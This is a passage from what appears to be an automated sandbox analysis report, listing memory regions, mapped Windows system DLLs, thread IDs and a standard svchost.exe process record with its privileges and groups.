"\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4530 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4531 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4532 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4533 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4534 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4535 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4536 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4537 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4538 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 335 os_tid = 0x634 Thread: id = 336 os_tid = 0x7c8 Thread: id = 337 os_tid = 0x794 Thread: id = 338 os_tid = 0x790 Thread: id = 339 os_tid = 0x77c Thread: id = 340 os_tid = 0x778 Thread: id = 341 os_tid = 0x774 Thread: id = 342 os_tid = 0x6e4 Thread: id = 343 os_tid = 0x6d0 Thread: id = 344 os_tid = 0x680 Thread: id = 345 os_tid = 0x67c Thread: id = 346 os_tid = 0x650 Thread: id = 347 os_tid = 0x64c Thread: id = 348 os_tid = 0x620 Thread: id = 349 os_tid = 0x5f4 Thread: id = 350 os_tid = 0x5dc Thread: id = 351 os_tid = 0x5c0 Thread: id = 352 os_tid = 0x5bc Thread: id = 353 os_tid = 0x5b4 Thread: id = 354 os_tid = 0x5ac Thread: id = 355 os_tid = 0x5a4 Thread: id = 356 os_tid = 0x5a0 Thread: id = 357 os_tid = 0x59c Thread: id = 358 os_tid = 0x598 Thread: id = 359 os_tid = 0x564 Thread: id = 360 os_tid = 0x3b4 Thread: id = 361 os_tid = 0x370 Process: id = "29" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x56ae3000" os_pid = "0x390" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ccd5" [0xc000000f], "LOCAL" [0x7] Region: id = 4773 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4774 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4775 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4776 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4777 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4778 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 4779 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4780 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4781 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 4782 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4783 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 4784 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 4785 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4786 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 4787 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4788 start_va = 0x550000 end_va = 0x556fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 4789 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 4790 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 4791 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 4792 start_va = 0x5b0000 end_va = 0x5b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 4793 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4794 start_va = 0x5d0000 end_va = 0x5d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4795 start_va = 0x5e0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4796 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 4797 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 4798 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 4799 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 4800 start_va = 0xb20000 end_va = 0xf1afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 4801 start_va = 0xf20000 end_va = 0xf83fff monitored = 0 entry_point = 0xf35ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 4802 start_va = 0xf90000 end_va = 0xf90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 4803 start_va = 0xfa0000 end_va = 0xfa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fa0000" filename = "" Region: id = 4804 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 4805 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 4806 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 4807 start_va = 0x1300000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 4808 start_va = 0x1380000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 4809 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 4810 start_va = 0x1500000 end_va = 0x1506fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 4811 start_va = 0x1510000 end_va = 0x158ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 4812 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 4813 start_va = 0x1700000 end_va = 0x177ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 4814 start_va = 0x1780000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 4815 start_va = 0x1800000 end_va = 0x187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 4816 start_va = 0x1880000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001880000" filename = "" Region: id = 4817 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 4818 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 4819 start_va = 0x1b00000 end_va = 0x1b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 4820 start_va = 0x1b90000 end_va = 0x1c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 4821 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 4822 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 4823 start_va = 0x1f00000 end_va = 0x1fdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4824 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 4825 start_va = 0x2100000 end_va = 0x2436fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4826 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 4827 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 4828 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 4829 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 4830 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4831 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 4832 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 4833 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 4834 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 4835 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 4836 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 4837 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 4838 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 4839 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 4840 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 4841 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4842 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 4843 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 4844 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 4845 start_va = 0x7ff6c7f10000 end_va = 0x7ff6c7f1cfff monitored = 0 entry_point = 0x7ff6c7f13980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4846 start_va = 0x7ff842be0000 end_va = 0x7ff842d97fff monitored = 0 entry_point = 0x7ff842be5550 region_type = mapped_file name = "wmalfxgfxdsp.dll" filename = "\\Windows\\System32\\WMALFXGFXDSP.dll" (normalized: "c:\\windows\\system32\\wmalfxgfxdsp.dll") Region: id = 4847 start_va = 0x7ff844480000 end_va = 0x7ff844507fff monitored = 0 entry_point = 0x7ff844494510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 4848 start_va = 0x7ff851d50000 end_va = 0x7ff851d7afff monitored = 0 entry_point = 0x7ff851d5c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 4849 start_va = 0x7ff851d80000 end_va = 0x7ff851e8cfff monitored = 0 entry_point = 0x7ff851daf420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 4850 start_va = 0x7ff852870000 end_va = 0x7ff85287dfff monitored = 0 entry_point = 0x7ff852872e50 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 4851 start_va = 0x7ff852880000 end_va = 0x7ff85288afff monitored = 0 entry_point = 0x7ff852881d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4852 start_va = 0x7ff852890000 end_va = 0x7ff8528a9fff monitored = 0 entry_point = 0x7ff852892430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4853 start_va = 0x7ff8528b0000 end_va = 0x7ff8528c5fff monitored = 0 entry_point = 0x7ff8528b19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4854 start_va = 0x7ff8528d0000 end_va = 0x7ff852907fff monitored = 0 entry_point = 0x7ff8528d68f0 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 4855 start_va = 0x7ff852910000 end_va = 0x7ff852957fff monitored = 0 entry_point = 0x7ff85291a1e0 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 4856 start_va = 0x7ff852960000 end_va = 0x7ff852997fff monitored = 0 entry_point = 0x7ff852978cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4857 start_va = 0x7ff8529a0000 end_va = 0x7ff852a38fff monitored = 0 entry_point = 0x7ff8529ba090 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 4858 start_va = 0x7ff852a40000 end_va = 0x7ff852a9cfff monitored = 0 entry_point = 0x7ff852a52bf0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 4859 start_va = 0x7ff852ab0000 end_va = 0x7ff852bbafff monitored = 0 entry_point = 0x7ff852af2610 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 4860 start_va = 0x7ff852f00000 end_va = 0x7ff852f6ffff monitored = 0 entry_point = 0x7ff852f22960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 4861 start_va = 0x7ff855250000 end_va = 0x7ff855385fff monitored = 0 entry_point = 0x7ff85527f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 4862 start_va = 0x7ff8554f0000 end_va = 0x7ff8556a0fff monitored = 0 entry_point = 0x7ff855543690 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 4863 start_va = 0x7ff855af0000 end_va = 0x7ff855b39fff monitored = 0 entry_point = 0x7ff855afac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 4864 start_va = 0x7ff855d10000 end_va = 0x7ff855d20fff monitored = 0 entry_point = 0x7ff855d13320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 4865 start_va = 0x7ff855fa0000 end_va = 0x7ff855fa8fff monitored = 0 entry_point = 0x7ff855fa19a0 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 4866 start_va = 0x7ff855fb0000 end_va = 0x7ff855fbafff monitored = 0 entry_point = 0x7ff855fb1cd0 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 4867 start_va = 0x7ff856890000 end_va = 0x7ff8568a7fff monitored = 0 entry_point = 0x7ff856895910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4868 start_va = 0x7ff857c10000 end_va = 0x7ff857d95fff monitored = 0 entry_point = 0x7ff857c5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4869 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4870 start_va = 0x7ff858130000 end_va = 0x7ff858156fff monitored = 0 entry_point = 0x7ff858137940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4871 start_va = 0x7ff858160000 end_va = 0x7ff858209fff monitored = 0 entry_point = 0x7ff858187910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4872 start_va = 0x7ff858210000 end_va = 0x7ff85830ffff monitored = 0 entry_point = 0x7ff858250f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 4873 start_va = 0x7ff858570000 end_va = 0x7ff8585a1fff monitored = 0 entry_point = 0x7ff858582340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 4874 start_va = 0x7ff8586f0000 end_va = 0x7ff858713fff monitored = 0 entry_point = 0x7ff8586f3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4875 start_va = 0x7ff858890000 end_va = 0x7ff858983fff monitored = 0 entry_point = 0x7ff85889a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4876 start_va = 0x7ff858be0000 end_va = 0x7ff858c10fff monitored = 0 entry_point = 0x7ff858be7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4877 start_va = 0x7ff858fc0000 end_va = 0x7ff85901bfff monitored = 0 entry_point = 0x7ff858fd6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4878 start_va = 0x7ff859020000 end_va = 0x7ff859075fff monitored = 0 entry_point = 0x7ff859030bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4879 start_va = 0x7ff8591f0000 end_va = 0x7ff8591fafff monitored = 0 entry_point = 0x7ff8591f19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4880 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4881 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4882 start_va = 0x7ff8596f0000 end_va = 0x7ff8596fffff monitored = 0 entry_point = 0x7ff8596f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4883 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4884 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4885 start_va = 0x7ff859850000 end_va = 0x7ff859a16fff monitored = 0 entry_point = 0x7ff8598adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4886 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4887 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4888 start_va = 0x7ff85a330000 end_va = 0x7ff85a3b5fff monitored = 0 entry_point = 0x7ff85a33d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 4889 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4890 start_va = 0x7ff85a530000 end_va = 0x7ff85a537fff monitored = 0 entry_point = 0x7ff85a531ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4891 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4892 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4893 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4894 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4895 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: 